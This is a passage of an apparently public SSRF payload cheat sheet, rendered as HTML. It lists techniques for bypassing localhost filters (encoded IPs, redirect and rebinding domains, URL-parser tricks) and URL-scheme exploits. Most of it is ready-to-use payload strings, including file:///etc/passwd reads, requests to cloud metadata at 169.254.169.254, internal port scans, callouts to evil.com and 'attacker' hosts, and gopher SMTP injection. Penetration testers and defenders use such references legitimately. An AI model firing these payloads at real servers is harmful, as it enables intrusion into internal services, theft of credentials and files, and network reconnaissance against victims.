</code></pre></div></p>
</li>
<li>
<p>Using <a href="http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm">IPv6/IPv4 Address Embedding</a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="n">http</span><span class="p">://[</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">ffff</span><span class="p">:</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">]</span>
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="n">http</span><span class="p">://[::</span><span class="n">ffff</span><span class="p">:</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">]</span>
</code></pre></div></p>
</li>
</ul>
<h3 id="bypass-localhost-with-a-domain-redirect">Bypass Localhost with a Domain Redirect</h3>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Redirect to</th>
</tr>
</thead>
<tbody>
<tr>
<td>localtest.me</td>
<td><code>::1</code></td>
</tr>
<tr>
<td>localh.st</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>spoofed.[BURP_COLLABORATOR]</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>spoofed.redacted.oastify.com</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>company.127.0.0.1.nip.io</td>
<td><code>127.0.0.1</code></td>
</tr>
</tbody>
</table>
<p>The service <code>nip.io</code> is awesome for that, it will convert any ip address as a dns.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="n">NIP</span><span class="p">.</span><span class="n">IO</span> <span class="n">maps</span> <span class="p">&lt;</span><span class="n">anything</span><span class="p">&gt;.&lt;</span><span class="n">IP</span> <span class="n">Address</span><span class="p">&gt;.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span> <span class="n">to</span> <span class="n">the</span> <span class="n">corresponding</span> <span class="p">&lt;</span><span class="n">IP</span> <span class="n">Address</span><span class="p">&gt;,</span> <span class="n">even</span> <span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span> <span class="n">maps</span> <span class="n">to</span> <span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
</code></pre></div>
<h3 id="bypass-localhost-with-cidr">Bypass Localhost with CIDR</h3>
<p>The IP range <code>127.0.0.0/8</code> in IPv4 is reserved for loopback addresses. </p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">127</span><span class="p">.</span><span class="n">127</span><span class="p">.</span><span class="n">127</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">3</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span>
</code></pre></div>
<p>If you try to use any address in this range (127.0.0.2, 127.1.1.1, etc.) in a network, it will still resolve to the local machine</p>
<h3 id="bypass-using-rare-address">Bypass Using Rare Address</h3>
<p>You can short-hand IP addresses by dropping the zeros</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">/</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
</code></pre></div>
<h3 id="bypass-using-an-encoded-ip-address">Bypass Using an Encoded IP Address</h3>
<ul>
<li>
<p>Decimal IP location
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="n">http</span><span class="p">://</span><span class="n">2130706433</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="n">http</span><span class="p">://</span><span class="n">3232235521</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-11-3" name="__codelineno-11-3" href="#__codelineno-11-3"></a><span class="n">http</span><span class="p">://</span><span class="n">3232235777</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-11-4" name="__codelineno-11-4" href="#__codelineno-11-4"></a><span class="n">http</span><span class="p">://</span><span class="n">2852039166</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span>
</code></pre></div></p>
</li>
<li>
<p>Octal IP: Implementations differ on how to handle octal format of IPv4.
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="n">http</span><span class="p">://</span><span class="n">0177</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="n">http</span><span class="p">://</span><span class="n">o177</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="n">http</span><span class="p">://</span><span class="n">0o177</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a><span class="n">http</span><span class="p">://</span><span class="n">q177</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
</code></pre></div></p>
</li>
</ul>
<h3 id="bypass-using-different-encoding">Bypass Using Different Encoding</h3>
<ul>
<li>
<p>URL encoding: Single or double encode a specific URL to bypass blacklist
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span><span class="k">%</span><span class="n">61dmin</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span><span class="k">%</span><span class="n">2561dmin</span>
</code></pre></div></p>
</li>
<li>
<p>Enclosed alphanumeric: <code>①②③④⑤⑥⑦⑧⑨⑩⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽⑾⑿⒀⒁⒂⒃⒄⒅⒆⒇⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑⒒⒓⒔⒕⒖⒗⒘⒙⒚⒛⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ⓪⓫⓬⓭⓮⓯⓰⓱⓲⓳⓴⓵⓶⓷⓸⓹⓺⓻⓼⓽⓾⓿</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="n">http</span><span class="p">://</span><span class="err">ⓔⓧⓐⓜⓟⓛⓔ</span><span class="p">.</span><span class="err">ⓒⓞⓜ</span> <span class="p">=</span> <span class="n">example</span><span class="p">.</span><span class="n">com</span>
</code></pre></div></p>
</li>
<li>
<p>Unicode encoding: In some languages (.NET, Python 3) regex supports unicode by default. <code>\d</code> includes <code>0123456789</code> but also <code>๐๑๒๓๔๕๖๗๘๙</code>.</p>
</li>
</ul>
<h3 id="bypassing-using-a-redirect">Bypassing Using a Redirect</h3>
<ol>
<li>Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)</li>
<li>Launch the SSRF pointing to <code>vulnerable.com/index.php?url=http://redirect-server</code></li>
<li>You can use response codes <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307">HTTP 307</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308">HTTP 308</a> in order to retain HTTP method and body after the redirection.</li>
</ol>
<p>To perform redirects without hosting own redirect server or perform seemless redirect target fuzzing, use <a href="https://github.com/Horlad/r3dir">Horlad/r3dir</a>.</p>
<ul>
<li>
<p>Redirects to <code>http://localhost</code> with <code>307 Temporary Redirect</code> status code
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="n">https</span><span class="p">://</span><span class="n">307</span><span class="p">.</span><span class="n">r3dir</span><span class="p">.</span><span class="n">me</span><span class="p">/-</span><span class="n">-to</span><span class="p">/</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">localhost</span>
</code></pre></div></p>
</li>
<li>
<p>Redirects to <code>http://169.254.169.254/latest/meta-data/</code> with <code>302 Found</code> status code
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="n">https</span><span class="p">://</span><span class="n">62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a</span><span class="p">.</span><span class="n">302</span><span class="p">.</span><span class="n">r3dir</span><span class="p">.</span><span class="n">me</span>
</code></pre></div></p>
</li>
</ul>
<h3 id="bypass-using-dns-rebinding">Bypass Using DNS Rebinding</h3>
<p>Create a domain that change between two IPs. </p>
<ul>
<li><a href="http://1u.ms">1u.ms</a> - DNS rebinding utility</li>
</ul>
<p>For example to rotate between <code>1.2.3.4</code> and <code>169.254-169.254</code>, use the following domain:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="n">make</span><span class="p">-</span><span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4-rebind</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254-rr</span><span class="p">.</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span>
</code></pre></div>
<p>Verify the address with <code>nslookup</code>.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="p">$</span> <span class="n">nslookup</span> <span class="n">make</span><span class="p">-</span><span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4-rebind</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254-rr</span><span class="p">.</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="n">Name</span><span class="p">:</span> <span class="n">make</span><span class="p">-</span><span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4-rebind</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254-rr</span><span class="p">.</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="n">Address</span><span class="p">:</span> <span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4</span>
<a id="__codelineno-18-4" name="__codelineno-18-4" href="#__codelineno-18-4"></a>
<a id="__codelineno-18-5" name="__codelineno-18-5" href="#__codelineno-18-5"></a><span class="p">$</span> <span class="n">nslookup</span> <span class="n">make</span><span class="p">-</span><span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4-rebind</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254-rr</span><span class="p">.</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span>
<a id="__codelineno-18-6" name="__codelineno-18-6" href="#__codelineno-18-6"></a><span class="n">Name</span><span class="p">:</span> <span class="n">make</span><span class="p">-</span><span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4-rebind</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254-rr</span><span class="p">.</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span>
<a id="__codelineno-18-7" name="__codelineno-18-7" href="#__codelineno-18-7"></a><span class="n">Address</span><span class="p">:</span> <span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span>
</code></pre></div>
<h3 id="bypass-abusing-url-parsing-discrepancy">Bypass Abusing URL Parsing Discrepancy</h3>
<p><a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf">A New Era Of SSRF Exploiting URL Parser In Trending Programming Languages - Research from Orange Tsai</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">\</span><span class="nv">@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">\</span><span class="nv">@@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">:\</span><span class="nv">@@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="c">#\@127.2.2.2:80/</span>
</code></pre></div>
<p><img alt="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true" src="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true" /></p>
<p>Parsing behavior by different libraries: <code>http://1.1.1.1 &amp;@2.2.2.2# @3.3.3.3/</code></p>
<ul>
<li><code>urllib2</code> treats <code>1.1.1.1</code> as the destination</li>
<li><code>requests</code> and browsers redirect to <code>2.2.2.2</code></li>
<li><code>urllib</code> resolves to <code>3.3.3.3</code></li>
</ul>
<h3 id="bypass-php-filter_var-function">Bypass PHP filter_var() Function</h3>
<p>In PHP 7.0.25, <code>filter_var()</code> function with the parameter <code>FILTER_VALIDATE_URL</code> allows URL such as:</p>
<ul>
<li><code>http://test???test.com</code></li>
<li><code>0://evil.com:80;http://google.com:80/</code></li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a> <span class="k">echo</span> <span class="nb">var_dump</span><span class="p">(</span><span class="nb">filter_var</span><span class="p">(</span><span class="s2">&quot;http://test???test.com&quot;</span><span class="p">,</span> <span class="nx">FILTER_VALIDATE_URL</span><span class="p">));</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a> <span class="k">echo</span> <span class="nb">var_dump</span><span class="p">(</span><span class="nb">filter_var</span><span class="p">(</span><span class="s2">&quot;0://evil.com;google.com&quot;</span><span class="p">,</span> <span class="nx">FILTER_VALIDATE_URL</span><span class="p">));</span>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="cp">?&gt;</span>
</code></pre></div>
<h3 id="bypass-using-jar-scheme">Bypass Using JAR Scheme</h3>
<p>This attack technique is fully blind, you won't see the result.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="n">jar</span><span class="p">:</span><span class="n">scheme</span><span class="p">://</span><span class="n">domain</span><span class="p">/</span><span class="n">path</span><span class="p">!/</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="n">jar</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a><span class="n">jar</span><span class="p">:</span><span class="n">https</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
<a id="__codelineno-21-4" name="__codelineno-21-4" href="#__codelineno-21-4"></a><span class="n">jar</span><span class="p">:</span><span class="n">ftp</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
</code></pre></div>
<h2 id="exploitation-via-url-scheme">Exploitation via URL Scheme</h2>
<h3 id="file">File</h3>
<p>Allows an attacker to fetch the content of a file on the server. Transforming the SSRF into a file read.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">file</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="n">file</span><span class="p">://\/\/</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
</code></pre></div>
<h3 id="http">HTTP</h3>
<p>Allows an attacker to fetch any content from the web, it can also be used to scan ports.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">22</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">443</span>
</code></pre></div>
<p><img alt="SSRF stream" src="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true" /></p>
<h3 id="dict">Dict</h3>
<p>The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="n">dict</span><span class="p">://&lt;</span><span class="n">user</span><span class="p">&gt;;&lt;</span><span class="n">auth</span><span class="p">&gt;@&lt;</span><span class="n">host</span><span class="p">&gt;:&lt;</span><span class="n">port</span><span class="p">&gt;/</span><span class="n">d</span><span class="p">:&lt;</span><span class="n">word</span><span class="p">&gt;:&lt;</span><span class="n">database</span><span class="p">&gt;:&lt;</span><span class="n">n</span><span class="p">&gt;</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">attacker</span><span class="p">:</span><span class="n">11111</span><span class="p">/</span>
</code></pre></div>
<h3 id="sftp">SFTP</h3>
<p>A network protocol used for secure file transfer over secure shell</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">sftp</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">11111</span><span class="p">/</span>
</code></pre></div>
<h3 id="tftp">TFTP</h3>
<p>Trivial File Transfer Protocol, works over UDP</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">tftp</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">12346</span><span class="p">/</span><span class="n">TESTUDPPACKET</span>
</code></pre></div>
<h3 id="ldap">LDAP</h3>
<p>Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">ldap</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">11211</span><span class="p">/</span><span class="k">%</span><span class="n">0astats</span><span class="k">%</span><span class="n">0aquit</span>
</code></pre></div>
<h3 id="netdoc">Netdoc</h3>
<p>Wrapper for Java when your payloads struggle with "<code>\n</code>" and "<code>\r</code>" characters.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">netdoc</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
</code></pre></div>
<h3 id="gopher">Gopher</h3>
<p>The <code>gopher://</code> protocol is a lightweight, text-based protocol that predates the modern World Wide Web. It was designed for distributing, searching, and retrieving documents over the Internet.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="n">gopher</span><span class="p">://</span><span class="no">[host]</span><span class="p">:</span><span class="no">[port]</span><span class="p">/</span><span class="no">[type][selector]</span>
</code></pre></div>
<p>This scheme is very useful as it as be used to send data to TCP protocol.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="n">gopher</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">25</span><span class="p">/</span><span class="n">_MAIL</span><span class="k">%</span><span class="n">20FROM</span><span class="p">:&lt;</span><span class="n">attacker</span><span class="nv">@example</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span><span class="k">%</span><span class="n">0D</span><span class="k">%</span><span class="n">0A</span>
</code></pre></div>
<p>Refer to the SSRF Advanced Exploitation to explore the <code>gopher://</code> protocol deeper.</p>
<h2 id="blind-exploitation">Blind Exploitation</h2>
<blockquote>
<p>When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. </p>
</blockquote>
<p>Use an SSRF chain to gain an Out-of-Band output: <a href="https://github.com/assetnote/blind-ssrf-chains">assetnote/blind-ssrf-chains</a></p>
<p><strong>Possible via HTTP(s)</strong></p>
<ul>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#elasticsearch">Elasticsearch</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#weblogic">Weblogic</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#consul">Hashicorp Consul</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#shellshock">Shellshock</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#druid">Apache Druid</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#solr">Apache Solr</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#peoplesoft">PeopleSoft</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#struts">Apache Struts</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#jboss">JBoss</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#confluence">Confluence</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#jira">Jira</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#atlassian-products">Other Atlassian Products</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#opentsdb">OpenTSDB</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#jenkins">Jenkins</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#hystrix">Hystrix Dashboard</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#w3">W3 Total Cache</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#docker">Docker</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#redisexporter">Gitlab Prometheus Redis Exporter</a></li>
</ul>
<p><strong>Possible via Gopher</strong></p>
<ul>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#redis">Redis</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#memcache">Memcache</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#tomcat">Apache Tomcat</a></li>
</ul>
